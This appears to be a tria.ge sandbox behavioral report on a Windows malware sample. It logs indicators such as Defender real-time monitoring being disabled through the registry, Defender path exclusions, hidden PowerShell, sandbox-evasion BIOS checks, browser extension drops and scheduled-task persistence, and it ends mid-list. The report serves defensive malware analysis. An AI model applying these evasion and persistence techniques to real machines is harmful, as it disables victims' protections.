Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
199s -
max time network
202s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
11/07/2024, 22:34
Static task
static1
Behavioral task
behavioral1
Sample
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
Resource
win7-20240704-en
General
-
Target
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
-
Size
7.2MB
-
MD5
b31e27b00781e72004147d1d49675fef
-
SHA1
8a7529ea0b52c8cdf2ee0c85ec0af09dcd9c157f
-
SHA256
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad
-
SHA512
35310f9a55916758403f212344758156cf56a90c8cbab4d0d87e0e96db9a94da8526b5df7083e4b26938da9dd79ed201bc1950a320c1fee162a4098ccb188044
-
SSDEEP
196608:91OHzJaVk0fZhEF8H7v5467/tfE/UOYAOC2oMbnus8G8:3OHzJaVpEF8bq67/tcULCXMCsF8
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JHBMAPUCCwSCzfVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qMeQRvtmXyxU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fjxFshYjVWUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixMyiQryENPMC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JHBMAPUCCwSCzfVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixMyiQryENPMC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WIQLPldOU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qMeQRvtmXyxU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fjxFshYjVWUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WIQLPldOU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 2124 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1248 powershell.exe 2608 powershell.exe 2872 powershell.EXE 1656 powershell.EXE 896 powershell.exe 2316 powershell.EXE 780 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Control Panel\International\Geo\Nation wdFsAvn.exe -
Executes dropped EXE 4 IoCs
pid Process 2772 Install.exe 2784 Install.exe 856 WCEJedM.exe 344 wdFsAvn.exe -
Loads dropped DLL 23 IoCs
pid Process 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 2772 Install.exe 2772 Install.exe 2772 Install.exe 2772 Install.exe 2784 Install.exe 2784 Install.exe 2784 Install.exe 2620 WerFault.exe 2620 WerFault.exe 2620 WerFault.exe 2124 rundll32.exe 2124 rundll32.exe 2124 rundll32.exe 2124 rundll32.exe 2060 WerFault.exe 2060 WerFault.exe 2060 WerFault.exe 2060 WerFault.exe 2060 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json wdFsAvn.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json wdFsAvn.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 wdFsAvn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 wdFsAvn.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 wdFsAvn.exe File created C:\Windows\system32\GroupPolicy\gpt.ini WCEJedM.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wdFsAvn.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 wdFsAvn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WCEJedM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WCEJedM.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 wdFsAvn.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WCEJedM.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wdFsAvn.exe File created C:\Program Files (x86)\fjxFshYjVWUn\skijRUA.dll wdFsAvn.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\yAHbnlf.xml wdFsAvn.exe File created C:\Program Files (x86)\ixMyiQryENPMC\oAFxYQX.xml wdFsAvn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi wdFsAvn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi wdFsAvn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja wdFsAvn.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\ShonlPo.dll wdFsAvn.exe File created C:\Program Files (x86)\WIQLPldOU\jKBUsJ.dll wdFsAvn.exe File created C:\Program Files (x86)\WIQLPldOU\yEhSmvh.xml wdFsAvn.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\RjVKKBMUXscJi.dll wdFsAvn.exe File created C:\Program Files (x86)\ixMyiQryENPMC\JZkNjAm.dll wdFsAvn.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\mivLyKY.xml wdFsAvn.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\blQxnfAaNNFZMWpemd.job schtasks.exe File created C:\Windows\Tasks\AxfyqSaZTcFttLJtv.job schtasks.exe File created C:\Windows\Tasks\zuAKRFeuERsPXGg.job schtasks.exe File created C:\Windows\Tasks\cTixPRTTdvXlYhynT.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2620 856 WerFault.exe 42 2060 2784 WerFault.exe 32 1676 344 WerFault.exe 186 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D}\3a-f8-12-f6-b2-fc wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D} wdFsAvn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D}\WpadNetworkName = "Network 3" wdFsAvn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WCEJedM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot wdFsAvn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0095000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc\WpadDecisionTime = c03982b9e2d3da01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WCEJedM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WCEJedM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust wdFsAvn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root wdFsAvn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D}\WpadDecisionReason = "1" wdFsAvn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D}\WpadDecisionTime = c03982b9e2d3da01 wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs wdFsAvn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80f931a8e2d3da01 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WCEJedM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates wdFsAvn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" wdFsAvn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{437847E9-7806-4ED8-B7DF-F7076BAAEC8D}\WpadDecision = "0" wdFsAvn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc\WpadDecisionTime = c03982b9e2d3da01 wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs wdFsAvn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-f8-12-f6-b2-fc\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000208d1ca8e2d3da01 WCEJedM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA wdFsAvn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wdFsAvn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2656 schtasks.exe 1728 schtasks.exe 2304 schtasks.exe 2544 schtasks.exe 2760 schtasks.exe 2628 schtasks.exe 2736 schtasks.exe 2888 schtasks.exe 348 schtasks.exe 2620 schtasks.exe 1744 schtasks.exe 1120 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2608 powershell.exe 2872 powershell.EXE 2872 powershell.EXE 2872 powershell.EXE 1656 powershell.EXE 1656 powershell.EXE 1656 powershell.EXE 896 powershell.exe 2316 powershell.EXE 2316 powershell.EXE 2316 powershell.EXE 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 780 powershell.exe 1248 powershell.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe 344 wdFsAvn.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2608 powershell.exe Token: SeIncreaseQuotaPrivilege 920 WMIC.exe Token: SeSecurityPrivilege 920 WMIC.exe Token: SeTakeOwnershipPrivilege 920 WMIC.exe Token: SeLoadDriverPrivilege 920 WMIC.exe Token: SeSystemProfilePrivilege 920 WMIC.exe Token: SeSystemtimePrivilege 920 WMIC.exe Token: SeProfSingleProcessPrivilege 920 WMIC.exe Token: SeIncBasePriorityPrivilege 920 WMIC.exe Token: SeCreatePagefilePrivilege 920 WMIC.exe Token: SeBackupPrivilege 920 WMIC.exe Token: SeRestorePrivilege 920 WMIC.exe Token: SeShutdownPrivilege 920 WMIC.exe Token: SeDebugPrivilege 920 WMIC.exe Token: SeSystemEnvironmentPrivilege 920 WMIC.exe Token: SeRemoteShutdownPrivilege 920 WMIC.exe Token: SeUndockPrivilege 920 WMIC.exe Token: SeManageVolumePrivilege 920 WMIC.exe Token: 33 920 WMIC.exe Token: 34 920 WMIC.exe Token: 35 920 WMIC.exe Token: SeDebugPrivilege 2872 powershell.EXE Token: SeDebugPrivilege 1656 powershell.EXE Token: SeDebugPrivilege 896 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2316 WMIC.exe Token: SeIncreaseQuotaPrivilege 2316 WMIC.exe Token: SeSecurityPrivilege 2316 WMIC.exe Token: SeTakeOwnershipPrivilege 2316 WMIC.exe Token: SeLoadDriverPrivilege 2316 WMIC.exe Token: SeSystemtimePrivilege 2316 WMIC.exe Token: SeBackupPrivilege 2316 WMIC.exe Token: SeRestorePrivilege 2316 WMIC.exe Token: SeShutdownPrivilege 2316 WMIC.exe Token: SeSystemEnvironmentPrivilege 2316 WMIC.exe Token: SeUndockPrivilege 2316 WMIC.exe Token: SeManageVolumePrivilege 2316 WMIC.exe Token: SeDebugPrivilege 2316 powershell.EXE Token: SeDebugPrivilege 780 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2540 WMIC.exe Token: SeSecurityPrivilege 2540 WMIC.exe Token: SeTakeOwnershipPrivilege 2540 WMIC.exe Token: SeLoadDriverPrivilege 2540 WMIC.exe Token: SeSystemtimePrivilege 2540 WMIC.exe Token: SeBackupPrivilege 2540 